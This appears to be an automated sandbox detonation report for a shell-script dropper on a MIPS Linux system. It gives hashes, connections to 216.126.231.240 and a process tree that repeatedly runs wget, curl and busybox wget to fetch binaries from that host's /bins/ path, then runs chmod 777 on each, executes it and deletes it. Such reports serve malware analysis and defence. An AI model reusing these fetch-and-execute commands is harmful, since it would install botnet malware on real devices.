| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/796-1-0xb66a8000-0xb66b9044-memory.dmp
memory/796-2-0xb677b000-0xb678c044-memory.dmp
memory/854-3-0xb6743000-0xb6754044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-mipsbe-20240418-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
